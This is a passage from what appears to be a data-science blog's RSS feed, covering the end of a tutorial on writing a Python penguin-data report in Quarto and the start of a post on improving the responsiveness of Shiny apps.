&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;px.scatter(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; data,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; x=&amp;#34;body_mass_g&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; y=&amp;#34;bill_length_mm&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; color=&amp;#34;species&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; facet_col=&amp;#34;year&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; trendline=&amp;#34;ols&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;``
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;YAML code chunk options can be provided at the top of a code block, and are
prefixed with &lt;code&gt;#|&lt;/code&gt; followed by a space. Here we have used three options:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Setting &lt;code&gt;echo&lt;/code&gt; to &lt;code&gt;false&lt;/code&gt; will hide the code chunk in the rendered document&lt;/li&gt;
&lt;li&gt;A figure caption will be added by &lt;code&gt;fig-cap&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The figure width is controlled with &lt;code&gt;fig-width&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Some other common options include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;eval&lt;/code&gt;: if &lt;code&gt;false&lt;/code&gt;, the code will not be evaluated&lt;/li&gt;
&lt;li&gt;&lt;code&gt;warning&lt;/code&gt;: if &lt;code&gt;false&lt;/code&gt;, warning messages will be hidden&lt;/li&gt;
&lt;li&gt;&lt;code&gt;error&lt;/code&gt;: if &lt;code&gt;true&lt;/code&gt;, the code is allowed to error and the error message will
be displayed in the output&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="4-inline-ish-code"&gt;4) Inline-ish code&lt;/h4&gt;
&lt;p&gt;To insert code inline, just use a pair of backticks:
&lt;code&gt;`data = pd.read_csv(penguins_url)`&lt;/code&gt;. Additionally, if you want the code to
have Python formatting you can use &lt;code&gt;`data = pd.read_csv(penguins_url)`{.python}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;You may also wish to &lt;em&gt;execute&lt;/em&gt; code inline. Unfortunately, there isn&amp;rsquo;t a tidy
way to add Python-executable code inline as you can with the R language.
However, there does exist a workaround where you can create markdown code within
a Python codeblock and include values that require Python-execution in the
created markdown.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s demonstrate this by adding a sentence stating the average bill
length:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;``&lt;span style="color:#a5d6ff"&gt;`{python}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| echo: false
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;from IPython.display import display, Markdown
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;avg_length = data[&amp;#39;bill_length_mm&amp;#39;].mean()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;display(Markdown(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;f&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;According to our data, the average bill length is
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;{round(avg_length, 1)} mm.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;``
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We have made use of an f-string to insert a Python variable (rounded to one
decimal place) in the sentence. The &lt;code&gt;Markdown()&lt;/code&gt; function is used to convert
the string into markdown, and this is displayed in the rendered document using
&lt;code&gt;display()&lt;/code&gt;. If our data changes, we just need to re-render the document and
this text will be updated automatically!&lt;/p&gt;
&lt;p&gt;The screenshot below shows this sentence (along with our plot) in the rendered document:&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the plot in our rendered html output, along with the sentence containing executed inline code." height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/quarto-for-python-users/plot_screenshot.png" width="1136"&gt;&lt;/p&gt;
&lt;h3 id="wrapping-up"&gt;Wrapping up&lt;/h3&gt;
&lt;p&gt;Let&amp;rsquo;s put all of this together and apply some finishing touches:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;---
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;title: &amp;#34;Reporting on the bill length of penguins&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;author: &amp;#34;Myles Mitchell &amp;amp; Parisa Gregg&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;date: &amp;#34;14 December 2022&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;format: html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jupyter: python3
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;---
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Abstract
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Prepare yourself for a life-changing article about penguins...
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Introduction
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;Penguins&lt;/span&gt;](https://en.wikipedia.org/wiki/Penguin) are a family
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(**Spheniscidae**) of aquatic flightless
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;birds&lt;/span&gt;](https://en.wikipedia.org/wiki/Bird) that live primarily in the
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#7ee787"&gt;Southern Hemisphere&lt;/span&gt;](https://en.wikipedia.org/wiki/Southern_Hemisphere).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Their diet consists of:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Krill
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Fish
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; Squid
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;-&lt;/span&gt; More fish
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;There are 18 species of penguin, including:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;1.&lt;/span&gt; Macaroni penguin (*Eudyptes chrysolophus*)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;2.&lt;/span&gt; Chinstrap penguin (*Pygoscelis antarcticus*)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;3.&lt;/span&gt; Gentoo penguin (*Pygoscelis papua*)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Methods
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;To determine whether a higher body mass implies a longer bill, we loaded a
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins dataset using pandas:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;``&lt;span style="color:#a5d6ff"&gt;`{python}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;import pandas as pd
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;data = pd.read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#39;https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2020/2020-07-28/penguins.csv&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;data.head()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;`&lt;span style="color:#a5d6ff"&gt;`
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;## Results
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;The figure below shows the bill length plotted as a function of the body mass
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;for three species across a 3-year period.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;`&lt;span style="color:#a5d6ff"&gt;`{python}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| echo: false
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| fig-cap: &amp;#34;Bill length as a function of body mass&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| fig-width: 8
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;import plotly.express as px
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;px.scatter(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; data,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; x=&amp;#34;body_mass_g&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; y=&amp;#34;bill_length_mm&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; color=&amp;#34;species&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; facet_col=&amp;#34;year&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; trendline=&amp;#34;ols&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;`&lt;span style="color:#a5d6ff"&gt;`
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;`&lt;span style="color:#a5d6ff"&gt;`{python}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| echo: false
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;from IPython.display import display, Markdown
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;avg_length = data[&amp;#39;bill_length_mm&amp;#39;].mean()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;display(Markdown(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;f&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;According to our data, the average bill length is
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;{round(avg_length, 1)} mm.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;``
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Try copying this into your Quarto document or alternatively you can download the full code &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/2023-quarto-for-python-users" rel="external"&gt;here&lt;/a&gt;. Upon rendering, an html document like the one at this &lt;a href="https://jumpingrivers.github.io/blog/quarto_python_penguins_report.html" rel="external"&gt;webpage&lt;/a&gt; should be created.&lt;/p&gt;
&lt;p&gt;Hopefully you can now appreciate the beauty of Quarto! By having the code used
to generate the content embedded in the document, our report is fully
automated; if the data changes, we just need to click render to update the
content. This also makes it easy for a colleague to reproduce the report
themselves. And because Quarto uses plain text files, it&amp;rsquo;s also great for
version control with Git!&lt;/p&gt;
&lt;h3 id="further-reading"&gt;Further reading&lt;/h3&gt;
&lt;p&gt;We&amp;rsquo;ve only covered web reports in this post, but with Quarto you can also write
presentations, PDF articles, word documents, and more! There is much more detail
in the fantastic &lt;a href="https://quarto.org/" rel="external"&gt;Quarto documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Look out for our future post on Jupyter notebooks and Quarto!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/quarto-for-python-users/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Improving the responsiveness of Shiny applications</title><link>https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/</link><pubDate>Thu, 26 Jan 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="what-do-we-mean-by-responsiveness"&gt;What do we mean by &amp;ldquo;responsiveness&amp;rdquo;?&lt;/h2&gt;
&lt;p&gt;Confusingly (and rather unhelpfully) when it comes to web applications there are two different topics that may be referred to by the terms &amp;ldquo;responsive&amp;rdquo; or &amp;ldquo;responsiveness&amp;rdquo;. If you stick &amp;ldquo;responsive UI&amp;rdquo; into your favourite search engine the top results will concern &amp;ldquo;responsive design&amp;rdquo; - the practice of making websites and applications work across devices, regardless of device and browser dimensions. That&amp;rsquo;s an interesting and important topic when it comes to designing data-science applications but it&amp;rsquo;s not what we&amp;rsquo;re covering here.&lt;/p&gt;
&lt;p&gt;What we&amp;rsquo;re covering here is responsiveness that you might stick &amp;ldquo;un&amp;rdquo; in front of if things got really bad.
It&amp;rsquo;s about making your user interface feel like it responds instantaneously to a user&amp;rsquo;s interaction. We&amp;rsquo;ll go from covering clicking a button and making sure the user sees some kind of simple acknowledgement the button has been clicked to clicking a button (or dragging a slider or…) and immediately seeing the results of complex computations.&lt;/p&gt;
&lt;p&gt;While related, responsiveness isn&amp;rsquo;t the same as performance. Performance is about completing an operation in the minimal amount of time, while responsiveness is about meeting human needs for feedback when executing an action.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-improving-responsiveness-shiny-applications"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="motivation"&gt;Motivation&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;ve made a quick and simple {shiny} app as a toy for your own benefit maybe you shouldn&amp;rsquo;t care that much if it &amp;ldquo;feels&amp;rdquo; responsive. But if you&amp;rsquo;re making an application you want to be used by others you presumably want them to take something from it. That could be &amp;ldquo;Wow, I finally understand Fourier Transforms&amp;rdquo; (I would love someone to make an app that could make me say that), or &amp;ldquo;Clearly I need to buy this product/service from this company&amp;rdquo; or simply &amp;ldquo;This person is very clever, we should hire them&amp;rdquo;. You&amp;rsquo;re not likely to get those kinds of responses if your app is &lt;em&gt;unresponsive&lt;/em&gt; to interaction. If your user clicks something and nothing happens as far as they can see - they don&amp;rsquo;t know that somewhere, perhaps the other side of the world, there&amp;rsquo;s a server performing millions of operations for their benefit - they&amp;rsquo;ll feel frustrated and likely give up pretty quickly.&lt;/p&gt;
&lt;p&gt;&amp;ldquo;Guru of website usability&amp;rdquo; &lt;a href="https://en.wikipedia.org/wiki/Jakob_Nielsen_(usability_consultant)" rel="external"&gt;Jakob Nielsen&lt;/a&gt; wrote that &lt;a href="https://www.nngroup.com/articles/website-response-times/" rel="external"&gt;responsiveness matters&lt;/a&gt; because of&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Human limitations&lt;/strong&gt;, especially in the areas of memory and attention&amp;hellip; We simply don&amp;rsquo;t perform as well if we have to wait and suffer the inevitable decay of information stored in short-term memory.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Human aspirations&lt;/strong&gt;. We like to feel in control of our destiny rather than subjugated to a computer&amp;rsquo;s whims. Also, when companies make us wait instead of providing responsive service, they seem either arrogant or incompetent.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;Jeff Johnson gives more details in his excellent &lt;a href="https://www.elsevier.com/books/designing-with-the-mind-in-mind/johnson/978-0-12-818202-4" rel="external"&gt;Designing with the Mind in Mind&lt;/a&gt;. From page 246 of the third edition:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;If software waits longer than 0.1 second to show a response to a user&amp;rsquo;s action, the perception of cause and effect is broken; the software&amp;rsquo;s reaction will not seem to be a result of the user&amp;rsquo;s action. Meeting the 0.1 second deadline is essential to support users&amp;rsquo; perceptions that they are directly manipulating objects on the display. Therefore, onscreen buttons have 0.1 second to show they&amp;rsquo;ve been clicked; otherwise, users will assume they missed and click again. This does not mean that buttons have to complete their &lt;em&gt;function&lt;/em&gt; in 0.1 second &amp;mdash; only that they must show that they have been &lt;em&gt;pressed&lt;/em&gt; by that deadline.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="the-simplest-improvements-you-can-make"&gt;The simplest improvements you can make&lt;/h2&gt;
&lt;p&gt;Simply making sure the user is aware their click or tap was registered and something is happening is a great first step. Probably the simplest of all options is to set the cursor style to &amp;ldquo;wait&amp;rdquo; when the app is busy. Assuming your application already has a custom-CSS file, that&amp;rsquo;s as simple as adding something like the following:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-css" data-lang="css"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;html&lt;/span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;shiny-busy&lt;/span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;container-fluid&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;cursor&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;wait&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="assets/cursor-wait.gif" alt="A gif showing the Mac version of the wait cursor style after a button is pressed" style="width: 323px; max-width: 100%; display:block; margin-left:auto; margin-right: auto" /&gt;
&lt;p&gt;The biggest issue here is it only works if the user has a visible cursor. For something that works on touch devices and is easy to add, you might want to take a look at &lt;a href="https://github.com/daattali/shinycssloaders" rel="external"&gt;{shinycssloaders}&lt;/a&gt; (see below) and/or &lt;a href="https://shiny.john-coene.com/waiter/" rel="external"&gt;{waiter}&lt;/a&gt; that we covered in our article on &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui"&gt;Top 5 Shiny UI Add-On Packages&lt;/a&gt;.&lt;/p&gt;
&lt;img src="assets/shinycssloaders.gif" alt="A gif of a plot being re-generated with a shinycssloader showing during rendering." style="width: 100%" /&gt;
&lt;p&gt;If the user might have to wait longer than a few seconds for the process they&amp;rsquo;ve just set in motion to complete, you should consider a progress indicator. From page 247 of DwtMiM:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Because 1 second is the maximum gap expected in conversation, and because operating an interactive system is a form of conversation, interactive systems should avoid lengthy gaps in their side of the conversation. Otherwise, the human user will wonder what is happening. Systems have about 1 second to either do what the user asked or indicate how long it will take. Otherwise, users get impatient.&lt;/p&gt;
&lt;p&gt;If an operation will take more than a few seconds, a progress indicator is needed. Progress indicators are an interactive system&amp;rsquo;s way of keeping its side of the expected conversational protocol: &amp;ldquo;I&amp;rsquo;m working on the problem. Here is how much progress I have made and an indication of how much more time it will take.&amp;rdquo;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The &lt;a href="https://shiny.rstudio.com/gallery/progress-bar-example.html" rel="external"&gt;{shiny} package itself&lt;/a&gt; has a progress indicator, while the &lt;a href="https://shiny.john-coene.com/waiter/" rel="external"&gt;{waiter} package&lt;/a&gt; also offers a nice built-in-to-button option, shown below:&lt;/p&gt;
&lt;img src="assets/progress-indicator.gif" alt="A gif of a progress indicator built into a button." style="width: 197px; max-width: 100%; display:block; margin-left:auto; margin-right: auto" /&gt;
&lt;h2 id="clearing-performance-bottlenecks"&gt;Clearing performance bottlenecks&lt;/h2&gt;
